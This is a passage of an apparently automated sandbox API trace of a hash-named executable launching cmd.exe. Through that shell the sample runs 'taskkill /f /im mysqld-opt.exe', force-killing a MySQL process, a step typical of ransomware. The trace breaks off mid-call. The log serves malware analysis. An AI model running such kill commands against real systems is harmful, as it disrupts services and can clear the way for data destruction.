lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0193.565] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0193.565] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0193.565] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0193.566] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x1000) returned 0x2 [0193.566] RegCloseKey (hKey=0x88) returned 0x0 [0193.566] time (in: timer=0x0 | out: timer=0x0) returned 0x62344230 [0193.566] srand (_Seed=0x62344230) [0193.566] GetCommandLineW () returned="cmd.exe /c \"taskkill /f /im mysqld-opt.exe \"" [0193.566] GetCommandLineW () returned="cmd.exe /c \"taskkill /f /im mysqld-opt.exe \"" [0193.566] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf47720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0193.566] GetProcessHeap () returned 0x500000 [0193.566] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x210) returned 0x509b40 [0193.566] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x509b48, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0193.566] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0193.566] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0193.567] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0193.567] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0193.567] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0193.567] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0193.567] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0193.567] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0193.567] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0193.567] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0193.567] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0193.567] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0193.567] GetProcessHeap () returned 0x500000 [0193.568] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x5086f0) returned 1 [0193.568] GetEnvironmentStringsW () returned 0x507cc8* [0193.568] GetProcessHeap () returned 0x500000 [0193.568] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0xa32) returned 0x50a798 [0193.568] FreeEnvironmentStringsA (penv="A") returned 1 [0193.569] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x1b [0193.569] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0193.569] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0193.569] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0193.569] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0193.569] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0193.569] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0193.569] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0193.569] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0193.569] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0193.569] GetProcessHeap () returned 0x500000 [0193.569] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x44) returned 0x5005c8 [0193.569] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x19fc54 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0193.569] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x104, lpBuffer=0x19fc54, lpFilePart=0x19fc4c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19fc4c*="Desktop") returned 0x1d [0193.570] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0193.570] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3ce179de, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x500618 [0193.570] FindClose (in: hFindFile=0x500618 | out: hFindFile=0x500618) returned 1 [0193.571] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84ac775d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RDhJ0CNFevzX", cAlternateFileName="RDHJ0C~1")) returned 0x500618 [0193.571] FindClose (in: hFindFile=0x500618 | out: hFindFile=0x500618) returned 1 [0193.571] _wcsnicmp (_String1="RDHJ0C~1", _String2="RDhJ0CNFevzX", _MaxCount=0xc) returned 16 [0193.571] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x8d4a6a0d, ftLastAccessTime.dwHighDateTime=0x1d83aa1, ftLastWriteTime.dwLowDateTime=0x8d4a6a0d, ftLastWriteTime.dwHighDateTime=0x1d83aa1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x500618 [0193.571] FindClose (in: hFindFile=0x500618 | out: hFindFile=0x500618) returned 1 [0193.571] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0193.572] SetCurrentDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 1 [0193.572] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 1 [0193.572] GetProcessHeap () returned 0x500000 [0193.572] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x50a798) returned 1 [0193.573] GetEnvironmentStringsW () returned 0x507cc8* [0193.573] GetProcessHeap () returned 0x500000 [0193.573] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0xa76) returned 0x509d58 [0193.573] FreeEnvironmentStringsA (penv="=") returned 1 [0193.573] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf47720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0193.573] GetProcessHeap () returned 0x500000 [0193.573] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x5005c8) returned 1 [0193.573] GetProcessHeap () returned 0x500000 [0193.573] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x400e) returned 0x50bc58 [0193.574] GetProcessHeap () returned 0x500000 [0193.574] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x50) returned 0x50a7d8 [0193.574] GetProcessHeap () returned 0x500000 [0193.574] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x4008) returned 0x50fc70 [0193.575] GetProcessHeap () returned 0x500000 [0193.575] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x4008) returned 0x513c80 [0193.577] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0193.578] GetProcessHeap () returned 0x500000 [0193.578] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x418) returned 0x50a830 [0193.578] SetErrorMode (uMode=0x0) returned 0x8003 [0193.578] SetErrorMode (uMode=0x1) returned 0x0 [0193.578] GetFullPathNameW (in: lpFileName="taskkill \\f \\.", nBufferLength=0x208, lpBuffer=0x50a838, lpFilePart=0x19fbac | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill \\f", lpFilePart=0x19fbac*="f") returned 0x29 [0193.578] SetErrorMode (uMode=0x8003) returned 0x1 [0193.578] GetProcessHeap () returned 0x500000 [0193.578] RtlReAllocateHeap (Heap=0x500000, Flags=0x0, Ptr=0x50a830, Size=0x82) returned 0x50a830 [0193.578] GetProcessHeap () returned 0x500000 [0193.578] RtlSizeHeap (HeapHandle=0x500000, Flags=0x0, MemoryPointer=0x50a830) returned 0x82 [0193.579] NeedCurrentDirectoryForExePathW (ExeName="taskkill \\f \\.") returned 1 [0193.579] GetProcessHeap () returned 0x500000 [0193.579] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x62) returned 0x50a8c0 [0193.579] GetProcessHeap () returned 0x500000 [0193.579] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0xb8) returned 0x50a930 [0193.579] GetProcessHeap () returned 0x500000 [0193.579] RtlReAllocateHeap (Heap=0x500000, Flags=0x0, Ptr=0x50a930, Size=0x62) returned 0x50a930 [0193.579] GetProcessHeap () returned 0x500000 [0193.579] RtlSizeHeap (HeapHandle=0x500000, Flags=0x0, MemoryPointer=0x50a930) returned 0x62 [0193.579] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0193.579] GetProcessHeap () returned 0x500000 [0193.579] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0xe0) returned 0x50a9a0 [0193.585] GetProcessHeap () returned 0x500000 [0193.585] RtlReAllocateHeap (Heap=0x500000, Flags=0x0, Ptr=0x50a9a0, Size=0x76) returned 0x50a9a0 [0193.585] GetProcessHeap () returned 0x500000 [0193.585] RtlSizeHeap (HeapHandle=0x500000, Flags=0x0, MemoryPointer=0x50a9a0) returned 0x76 [0193.586] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0193.586] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill \\f\\im mysqld-opt.exe ", fInfoLevelId=0x1, lpFindFileData=0x19f958, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f958) returned 0xffffffff [0193.586] GetLastError () returned 0x3 [0193.586] GetProcessHeap () returned 0x500000 [0193.587] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x50fc70) returned 1 [0193.587] GetProcessHeap () returned 0x500000 [0193.588] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x513c80) returned 1 [0193.588] GetProcessHeap () returned 0x500000 [0193.589] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x50bc58) returned 1 [0193.589] GetConsoleOutputCP () returned 0x1b5 [0193.590] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0193.590] GetUserDefaultLCID () returned 0x409 [0193.591] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0xf434a0, cchData=8 | out: lpLCData=":") returned 2 [0193.591] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0193.591] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0193.591] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x19fd84, cchData=128 | out: lpLCData="1") returned 2 [0193.592] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0xf434b0, cchData=8 | out: lpLCData="/") returned 2 [0193.592] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0xf43500, cchData=32 | out: lpLCData="Mon") returned 4 [0193.592] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0xf43540, cchData=32 | out: lpLCData="Tue") returned 4 [0193.592] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0xf43580, cchData=32 | out: lpLCData="Wed") returned 4 [0193.592] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0xf435c0, cchData=32 | out: lpLCData="Thu") returned 4 [0193.592] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0xf43600, cchData=32 | out: lpLCData="Fri") returned 4 [0193.592] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0xf43640, cchData=32 | out: lpLCData="Sat") returned 4 [0193.592] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0xf43680, cchData=32 | out: lpLCData="Sun") returned 4 [0193.592] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0xf434c0, cchData=8 | out: lpLCData=".") returned 2 [0193.592] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0xf434e0, cchData=8 | out: lpLCData=",") returned 2 [0193.592] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0193.595] GetProcessHeap () returned 0x500000 [0193.595] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x20c) returned 0x50aa68 [0193.595] GetConsoleTitleW (in: lpConsoleTitle=0x50aa68, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0193.597] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75600000 [0193.597] GetProcAddress (hModule=0x75600000, lpProcName="CopyFileExW") returned 0x7561ffc0 [0193.597] GetProcAddress (hModule=0x75600000, lpProcName="IsDebuggerPresent") returned 0x7561b0b0 [0193.598] GetProcAddress (hModule=0x75600000, lpProcName="SetConsoleInputExeNameW") returned 0x7559b440 [0193.598] GetProcessHeap () returned 0x500000 [0193.598] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x400a) returned 0x50bc58 [0193.598] GetProcessHeap () returned 0x500000 [0193.599] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x50bc58) returned 1 [0193.600] _wcsicmp (_String1="taskkill", _String2=")") returned 75 [0193.600] _wcsicmp (_String1="FOR", _String2="taskkill") returned -14 [0193.600] _wcsicmp (_String1="FOR/?", _String2="taskkill") returned -14 [0193.600] _wcsicmp (_String1="IF", _String2="taskkill") returned -11 [0193.600] _wcsicmp (_String1="IF/?", _String2="taskkill") returned -11 [0193.600] _wcsicmp (_String1="REM", _String2="taskkill") returned -2 [0193.600] _wcsicmp (_String1="REM/?", _String2="taskkill") returned -2 [0193.600] GetProcessHeap () returned 0x500000 [0193.600] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x58) returned 0x50ac80 [0193.600] GetProcessHeap () returned 0x500000 [0193.600] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x1a) returned 0x500578 [0193.601] GetProcessHeap () returned 0x500000 [0193.601] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x38) returned 0x50ace0 [0193.602] GetConsoleTitleW (in: lpConsoleTitle=0x19fa70, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0193.607] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0193.607] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0193.607] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0193.607] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0193.607] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0193.607] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0193.607] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0193.607] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0193.607] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0193.607] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0193.607] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0193.607] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0193.607] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0193.607] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0193.607] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0193.607] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0193.607] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0193.607] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0193.607] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0193.608] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0193.608] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0193.608] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0193.608] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0193.608] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0193.608] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0193.608] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0193.608] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0193.608] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0193.608] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0193.608] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0193.608] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0193.608] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0193.608] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0193.608] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0193.608] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0193.608] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0193.608] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0193.608] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0193.608] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0193.608] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0193.609] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0193.609] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0193.609] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0193.609] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0193.609] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0193.609] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0193.609] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0193.609] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0193.609] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0193.609] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0193.609] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0193.609] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0193.609] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0193.609] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0193.609] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0193.609] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0193.609] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0193.609] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0193.609] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0193.609] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0193.609] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0193.609] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0193.609] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0193.610] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0193.610] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0193.610] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0193.610] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0193.610] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0193.610] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0193.610] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0193.610] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0193.610] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0193.610] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0193.610] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0193.610] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0193.610] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0193.610] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0193.610] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0193.610] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0193.610] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0193.610] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0193.610] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0193.610] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0193.610] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0193.610] _wcsicmp (_String1="taskkill", _String2="FOR") returned 14 [0193.610] _wcsicmp (_String1="taskkill", _String2="IF") returned 11 [0193.610] _wcsicmp (_String1="taskkill", _String2="REM") returned 2 [0193.612] GetProcessHeap () returned 0x500000 [0193.612] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x210) returned 0x50ad20 [0193.612] GetProcessHeap () returned 0x500000 [0193.612] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x4a) returned 0x50af38 [0193.612] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0193.613] GetProcessHeap () returned 0x500000 [0193.613] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x418) returned 0x5005c8 [0193.613] SetErrorMode (uMode=0x0) returned 0x8003 [0193.614] SetErrorMode (uMode=0x1) returned 0x0 [0193.614] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x5005d0, lpFilePart=0x19f57c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19f57c*="Desktop") returned 0x1d [0193.614] SetErrorMode (uMode=0x8003) returned 0x1 [0193.614] GetProcessHeap () returned 0x500000 [0193.614] RtlReAllocateHeap (Heap=0x500000, Flags=0x0, Ptr=0x5005c8, Size=0x56) returned 0x5005c8 [0193.614] GetProcessHeap () returned 0x500000 [0193.614] RtlSizeHeap (HeapHandle=0x500000, Flags=0x0, MemoryPointer=0x5005c8) returned 0x56 [0193.614] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0193.614] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0193.615] GetProcessHeap () returned 0x500000 [0193.615] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x110) returned 0x50af90 [0193.615] GetProcessHeap () returned 0x500000 [0193.615] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x218) returned 0x500628 [0193.625] GetProcessHeap () returned 0x500000 [0193.625] RtlReAllocateHeap (Heap=0x500000, Flags=0x0, Ptr=0x500628, Size=0x112) returned 0x500628 [0193.625] GetProcessHeap () returned 0x500000 [0193.625] RtlSizeHeap (HeapHandle=0x500000, Flags=0x0, MemoryPointer=0x500628) returned 0x112 [0193.625] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0193.625] GetProcessHeap () returned 0x500000 [0193.625] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0xe0) returned 0x50b0a8 [0193.627] GetProcessHeap () returned 0x500000 [0193.627] RtlReAllocateHeap (Heap=0x500000, Flags=0x0, Ptr=0x50b0a8, Size=0x76) returned 0x50b0a8 [0193.627] GetProcessHeap () returned 0x500000 [0193.627] RtlSizeHeap (HeapHandle=0x500000, Flags=0x0, MemoryPointer=0x50b0a8) returned 0x76 [0193.627] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0193.627] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0193.628] GetLastError () returned 0x2 [0193.628] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0193.628] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x50b128 [0193.628] GetProcessHeap () returned 0x500000 [0193.628] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x14) returned 0x507550 [0193.628] FindClose (in: hFindFile=0x50b128 | out: hFindFile=0x50b128) returned 1 [0193.628] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.COM", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0193.629] GetLastError () returned 0x2 [0193.629] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.EXE", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x50b128 [0193.629] GetProcessHeap () returned 0x500000 [0193.629] RtlReAllocateHeap (Heap=0x500000, Flags=0x0, Ptr=0x507550, Size=0x4) returned 0x50b168 [0193.629] FindClose (in: hFindFile=0x50b128 | out: hFindFile=0x50b128) returned 1 [0193.629] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0193.629] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0193.629] GetConsoleTitleW (in: lpConsoleTitle=0x19f7fc, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0193.631] InitializeProcThreadAttributeList (in: lpAttributeList=0x19f728, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x19f70c | out: lpAttributeList=0x19f728, lpSize=0x19f70c) returned 1 [0193.631] UpdateProcThreadAttribute (in: lpAttributeList=0x19f728, dwFlags=0x0, Attribute=0x60001, lpValue=0x19f714, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x19f728, lpPreviousValue=0x0) returned 1 [0193.631] GetStartupInfoW (in: lpStartupInfo=0x19f760 | out: 